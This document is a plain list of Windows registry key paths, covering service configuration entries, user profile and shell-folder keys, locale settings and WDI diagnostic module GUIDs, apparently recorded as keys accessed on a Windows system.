HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\ObjectName HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000\ProfileImagePath HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Environment HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Volatile Environment HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Volatile Environment\0 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lsass.exe HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\IPBusEnum HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\IPBusEnum\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\IPBusEnum\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPAutoReg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPAutoReg\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPAutoReg\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\QWAVE HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\QWAVE\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\QWAVE\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\WOW64 HKEY_USERS\S-1-5-19 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\QWAVE\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\RequiredPrivileges HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-19 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-19\ProfileImagePath HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData HKEY_USERS\S-1-5-19\Environment HKEY_USERS\S-1-5-19\Volatile Environment HKEY_USERS\S-1-5-19\Volatile Environment\0 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Environment HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\RequiredPrivileges HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time\Dynamic DST HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\Environment HKEY_CURRENT_USER\Software\Classes\AppID\taskhost.exe HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\WDI\DiagnosticModules HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\NameResource 